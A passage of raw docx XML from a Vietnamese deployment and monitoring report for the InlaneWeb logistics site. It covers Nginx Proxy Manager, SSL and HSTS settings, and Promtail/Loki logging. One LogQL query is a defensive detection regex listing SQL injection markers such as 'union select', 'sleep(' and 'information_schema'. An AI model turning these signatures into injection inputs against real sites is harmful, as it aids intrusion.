        </w:rPr>
        <w:t xml:space="preserve"> của khối web sẽ hiểu nhầm các container giám sát là mồ côi và tiêu hủy chúng. Hệ thống giải quyết triệt để vấn đề này bằng cách:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khối giám sát: Khai báo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>name: inlaneweb-monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chạy với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>-p inlaneweb-monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khối web: Khai báo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>name: inlaneweb-prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chạy với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>-p inlaneweb-prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cấu hình thực thi song song độc lập (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>needs: [production_smoke_test]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho cả hai Job): Tách biệt hoàn toàn luồng chuyển giao của hai khối dịch vụ, cho phép hệ thống triển khai chỉ ứng dụng web, chỉ cụm giám sát, hoặc đồng thời cả hai mà không gây phụ thuộc chéo hay xung đột định danh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>3.4. Cấu hình tên miền, SSL và Reverse Proxy kép qua Nginx Proxy Manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tại máy chủ Production VPS, công cụ Nginx Proxy Manager đóng vai trò là Reverse Proxy trung tâm, tiếp nhận lưu lượng truy cập Internet qua các cổng tiêu chuẩn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> rồi điều phối vào mạng nội bộ Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</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Cổng thông tin logistics (`inlaneweb.ecotools.online`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Định tuyến lưu lượng vào container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên cổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>80</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Cấu hình kết nối Docker Network: Container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>proxy-manager-app-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> được kết nối trực tiếp vào mạng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker network connect inlaneweb_net proxy-manager-app-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), cho phép Nginx phân giải hostname container nội bộ mà không cần phụ thuộc vào IP tĩnh của máy chủ.</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Cổng giám sát an ninh tập trung (`grafana.ecotools.online`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Định tuyến lưu lượng vào container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_grafana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên cổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3000</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Kích hoạt tùy chọn Websockets Support trong Nginx Proxy Manager để duy trì kết nối WebSocket bền vững hai chiều giữa trình duyệt quản trị viên và máy chủ Grafana, phục vụ việc đẩy dữ liệu log và biểu đồ thời gian thực mà không gây trễ.</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Mô hình bảo vệ SSL đa lớp:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng chứng chỉ số SSL do Cloudflare cấp phát phối hợp cùng chứng chỉ số Let's Encrypt / Custom SSL trên Nginx Proxy Manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kích hoạt chế độ mã hóa Full Strict SSL, bật cờ bảo vệ HSTS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>max-age=63072000; includeSubDomains; preload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và chuyển hướng bắt buộc toàn bộ lưu lượng HTTP sang HTTPS. Toàn bộ dữ liệu truyền nhận qua mạng Internet đều được mã hóa tuyệt đối, ngăn chặn triệt để nguy cơ tấn công trung gian nghe lén.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H1"/>
        <w:spacing w:before="280" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 4: HỆ THỐNG GIÁM SÁT VÀ TỰ ĐỘNG KHÔI PHỤC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>4.1. Tách biệt log ứng dụng và log truy cập web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để phục vụ công tác điều tra sự cố và phát hiện tấn công mạng một cách nhanh chóng và chính xác, kiến trúc thu thập nhật ký được phân chia thành hai luồng dữ liệu độc lập:</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ỨNG DỤNG INLANEWEB</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               │</w:t>
              <w:br/>
              <w:t xml:space="preserve">             ┌─────────────────────────────────┴─────────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve">             ▼                                                                   ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">    [LUỒNG 1: CHẨN ĐOÁN LỖI ỨNG DỤNG]                                   [LUỒNG 2: LƯU LƯỢNG TRUY CẬP HTTP]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    - Thư viện: InlaneLogger                                            - Định dạng: Apache CustomLog JSON</w:t>
              <w:br/>
              <w:t xml:space="preserve">    - Cơ chế: Bắt ngoại lệ chuỗi                                        - Cấu trúc: Client IP, URI, Query, Status</w:t>
              <w:br/>
              <w:t xml:space="preserve">    - Mục đích: Phân tích cú pháp DB, Stack Trace                       - Mục đích: Phát hiện tấn công SQLi, XSS</w:t>
              <w:br/>
              <w:t xml:space="preserve">             │                                                                   │</w:t>
              <w:br/>
              <w:t xml:space="preserve">             └─────────────────────────────────┬─────────────────────────────────┘</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                Đẩy ra STDOUT / STDERR Container</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        Docker Daemon Engine Socket (/var/run/docker.sock)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                     Promtail 3.0 Collector</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                               ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                        Grafana Loki 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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Luồng 1 — Chẩn đoán lỗi nội bộ ứng dụng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Được quản lý thông qua lớp nghiệp vụ độc lập </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneLogger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tại thư mục nguồn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/web/src/lib/logger.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>). Khi hệ thống gặp các lỗi nghiêm trọng như lỗi kết nối cơ sở dữ liệu hoặc lỗi cú pháp truy vấn SQL, logger tự động trích xuất nguyên nhân gốc, chuỗi các ngoại lệ lồng nhau cùng toàn bộ vết ngăn xếp Stack Trace, phục vụ việc gỡ lỗi logic cho kỹ sư phần mềm.</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Luồng 2 — Chẩn đoán tấn công lưu lượng HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Máy chủ Apache được tái cấu hình để ghi lại toàn bộ các yêu cầu HTTP dưới dạng chuỗi JSON có cấu trúc hoàn chỉnh thay cho định dạng văn bản thô Common Log Format truyền thống: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LogFormat "{\"timestamp\":\"%{%Y-%m-%dT%H:%M:%S%z}t\",\"client_ip\":\"%a\",\"method\":\"%m\",\"uri\":\"%U\",\"query\":\"%q\",\"status\":%&gt;s,\"bytes\":%B,\"referer\":\"%{Referer}i\",\"user_agent\":\"%{User-Agent}i\"}" custom_json</w:t>
              <w:br/>
              <w:t xml:space="preserve">   CustomLog /proc/self/fd/1 custom_json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Việc chuẩn hóa này cho phép các tác tử thu thập nhật ký phân tích cú pháp trực tiếp mà không cần sử dụng các biểu thức chính quy phức tạp, giảm thiểu tối đa tải tính toán trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>4.2. Thu thập và xem log tập trung trên Grafana bằng Promtail và Loki</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2.1. Kiến trúc lưu trữ và tối ưu tài nguyên của Loki</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Promtail 3.0 Collector:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đóng vai trò là tác tử thu thập nhật ký. Promtail kết nối trực tiếp vào tệp socket của Docker Daemon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, tự động phát hiện các vùng chứa có nhãn giám sát, bóc tách cấu trúc JSON và đính kèm các nhãn định danh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>container="ilfreight_web"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>service_name="ilfreight_web"</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Grafana Loki 3.0 Engine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khác với các hệ thống Elasticsearch tiêu tốn dung lượng RAM lớn (thường đòi hỏi từ 4GB đến 8GB RAM chỉ cho tầng chỉ mục), Loki chỉ thực hiện đánh chỉ mục theo nhãn và nén các đoạn nhật ký thành các khối dữ liệu lưu trữ trên ổ đĩa. Cách tiếp cận này giúp giảm thiểu hơn 80% dung lượng lưu trữ cần thiết, cho phép triển khai bền vững trên các máy chủ VPS cấu hình tiết kiệm tài nguyên.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ngôn ngữ truy vấn LogQL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sử dụng cú pháp tương đồng với PromQL, kết hợp bộ lọc nhãn và bộ lọc nội dung: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Đếm tần suất các yêu cầu có dấu hiệu tấn công SQL Injection trong 5 phút</w:t>
              <w:br/>
              <w:t xml:space="preserve">  sum by (client_ip) (</w:t>
              <w:br/>
              <w:t xml:space="preserve">    count_over_time(</w:t>
              <w:br/>
              <w:t xml:space="preserve">      {container="ilfreight_web"} </w:t>
              <w:br/>
              <w:t xml:space="preserve">      | json </w:t>
              <w:br/>
              <w:t xml:space="preserve">      | uri =~ "(?i).*(union.*select|sleep\\(|extractvalue|information_schema).*" [5m]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    )</w:t>
              <w:br/>
              <w:t xml:space="preserve">  )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2.2. Bảng điều khiển trực quan hóa 8 phân vùng giám sát an ninh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng điều khiển trung tâm mang tên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"InlaneWeb Logistics — Centralized Observability &amp; Anomaly Dashboard"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb-observability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) được nạp tự động qua cơ chế Provisioning của Grafana, chia tách thành 8 bảng hiển thị độc lập:</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Panel 1 — Vết ngăn xếp và chuỗi ngoại lệ ứng dụng:</w:t>
      </w:r>
      <w:r>
